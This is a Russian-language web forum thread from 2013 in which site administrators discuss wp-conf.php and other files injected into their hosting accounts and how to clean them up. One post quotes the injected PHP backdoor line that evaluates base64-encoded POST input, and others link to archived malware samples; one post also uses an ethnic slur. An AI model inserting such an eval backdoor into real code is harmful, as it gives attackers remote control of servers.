Просмотр темы
в корне всех сайтов появился wp-conf.php
|
|
Rush |
Опубликовано 26.02.2013 12:55
|
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41 |
ну если это log404, то на сервере они ничего не делают, т.к. их там нет
|
|
|
Alex |
Опубликовано 26.02.2013 12:59
|
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05 |
судя по айпи загрузили из киева хохлы шалят |
|
|
Zaxap |
Опубликовано 26.02.2013 13:02
|
Элита Сообщений: 1090 Зарегистрирован: 05.09.2012 10:32 |
Сразу в голове возник наш старый добрый Вова Как он мог так поступить??? Зло не дремлет, а я добрый...
|
|
|
Polarfox |
Опубликовано 26.02.2013 14:34
|
Администратор Разработчики Группа поддержки Сообщений: 3384 Зарегистрирован: 20.08.2010 14:03 |
Zaxap, у тя память хреновая чтоле, это фаел лога моей странички 404, по нормальному на него еще можно защиту поставить через ассесс, можешь удалять если страницей не пользуешься.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
|
|
|
Zaxap |
Опубликовано 26.02.2013 14:36
|
Элита Сообщений: 1090 Зарегистрирован: 05.09.2012 10:32 |
А откуда там ip? Я тоже так думал, но потом, после просмотра содержимого, усомнился) Ок. Ваше, так ваше, спорить не буду
Зло не дремлет, а я добрый...
|
|
|
Rush |
Опубликовано 26.02.2013 14:56
|
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41 |
сервер в украине купить может абсолютно любой человек. надо написать хостеру
|
|
|
Vova |
Опубликовано 26.02.2013 16:51
|
Ветеран Сообщений: 877 Зарегистрирован: 05.08.2011 11:53 |
Я? в корне всех сайтов появился wp-conf.php и 5-7 файлов w(набор цифр)n.php на хостинге 10 сайтов на фьюжене, 1 ворд пресс, 1 джумла может быть кто знает через что он проникает и размножается по всему аккаунту Отследи. Мои сайты: ABCVG.com / Допомога учням / ГДЗ / 8Gamers - Игровой портал / Мониторинг CS / Мониторинг игровых серверов / Хостинг от ABCVG.net
|
|
|
Alex |
Опубликовано 26.02.2013 18:41
|
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05 |
2.5 часа назад на хосте появилась папка pl в ней один файл index.php с таким содержанием <html> |
|
|
Vova |
Опубликовано 26.02.2013 18:44
|
Ветеран Сообщений: 877 Зарегистрирован: 05.08.2011 11:53 |
Експлоит. Ищи в скрипте где можна сделать експлоит.
Мои сайты: ABCVG.com / Допомога учням / ГДЗ / 8Gamers - Игровой портал / Мониторинг CS / Мониторинг игровых серверов / Хостинг от ABCVG.net
|
|
|
Polarfox |
Опубликовано 26.02.2013 18:48
|
Администратор Разработчики Группа поддержки Сообщений: 3384 Зарегистрирован: 20.08.2010 14:03 |
Обычное явление Alex, не зачистил двиг значит. Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
|
|
|
Alex |
Опубликовано 26.02.2013 18:56
|
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05 |
на одном сайте появился уже знакомый нам файл wp-conf.php скачал и запаковал в архив,
Изменил(а) Alex, 26.02.2013 19:17 |
|
|
Vova |
Опубликовано 26.02.2013 18:58
|
Ветеран Сообщений: 877 Зарегистрирован: 05.08.2011 11:53 |
Логи поставь и отлогируй. Даже можеш временно написать скрипт и подключить его при загрузке страницы. Он точно спалиться.
Мои сайты: ABCVG.com / Допомога учням / ГДЗ / 8Gamers - Игровой портал / Мониторинг CS / Мониторинг игровых серверов / Хостинг от ABCVG.net
|
|
|
dark |
Опубликовано 26.02.2013 19:11
|
Администратор Группа поддержки Сообщений: 222 Зарегистрирован: 05.12.2010 22:22 |
Alex написал: на одном сайте появился уже знакомый нам файл wp-conf.php скачал и запаковал в архив, В АРХИВЕ ВИРУС!!! http://rapid.ufanet.ru/7701002 Походу у тебя антивирусник его "запилил" на стадии заливки: Файл wp-conf.zip (22 Байт) Запакуй еще раз с паролем, что бы онлайн сервисы так же не могли его просканировать. |
|
|
Alex |
Опубликовано 26.02.2013 19:16
|
Администратор Группа тестеров Персонал сайта Сообщений: 1270 Зарегистрирован: 07.11.2010 13:05 |
вирус http://rapid.ufanet.ru/4309571 с другого компа, каспер даже не пикнул зараза |
|
|
dark |
Опубликовано 26.02.2013 19:37
|
Администратор Группа поддержки Сообщений: 222 Зарегистрирован: 05.12.2010 22:22 |
Это не вирус, это тот самый файловый менеджер, фотки которого выкладывались в соседней теме. P.S. Ищи по логам с какого ip его залили и запрашивали. К примеру поиском wp-conf.php в логах, если конечно на этом же сервере нету вордпресса. Это немного усложнит задачу. |
|
|
back1919 |
Опубликовано 26.02.2013 19:45
|
Опытный пользователь Сообщений: 270 Зарегистрирован: 08.03.2011 08:49 |
Черт, вы прям глаза на мир открыли. Когда-то давно сайты подцепили на украинском хостинге какую-то ерунду, антивирусом чистил, фтп менял. 1 в 1 -такие же сейчас wp файлы нашел. http://rusfolder.com/35209168 |
|
|
back1919 |
Опубликовано 26.02.2013 20:10
|
Опытный пользователь Сообщений: 270 Зарегистрирован: 08.03.2011 08:49 |
Слушайте, вообще беда, на другом хостинге таже хрень нашлась, но на этот раз положила сайт, все файл php с дрянью в 1-й строчке - как предотвратить на будущее эту напасть? Вот такая строчка везде) if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();} Изменил(а) back1919, 26.02.2013 20:17 Правда и отзывы сотрудников о работодателях.
|
|
|
alastor |
Опубликовано 26.02.2013 21:51
|
Опытный пользователь Сообщений: 210 Зарегистрирован: 20.08.2010 18:39 |
тоже заметил эту хрень на сайте... на бегете даже больше половины файлов снесли. хотя они говорят что они ничего не удаляли.. странно. Так чем лечится? Файлы удалил эти. пароли сменил. кстати, изменений по да дате не было никаких на системных файлах. только новые были добавлены. |
|
|
Vova |
Опубликовано 26.02.2013 21:58
|
Ветеран Сообщений: 877 Зарегистрирован: 05.08.2011 11:53 |
Атакуют бегет. У себя пока что ничего не наблюдал такого.
Мои сайты: ABCVG.com / Допомога учням / ГДЗ / 8Gamers - Игровой портал / Мониторинг CS / Мониторинг игровых серверов / Хостинг от ABCVG.net
|
|
|
Pisatel |
Опубликовано 27.02.2013 04:59
|
Ветеран Сообщений: 678 Зарегистрирован: 08.02.2013 05:51 |
Господа, то, что вы удаляете файлы и закрываете уязвимость может ничего не дать. Сам троян может лежать в бд, которую тоже нужно чистить. В общем, вот примерно так делать: нашли шелл. Закрыли уязвимость. Далее выясняем ДАТУ появления шелла, восстанавливаем бд ДО этой даты, иначе- лопатить бд вручную и искать троян там. |
|
Поделиться этой темой | |
Социальные закладки: | |
URL: | |
BBcode: | |
HTML: |
Перейти на форум: |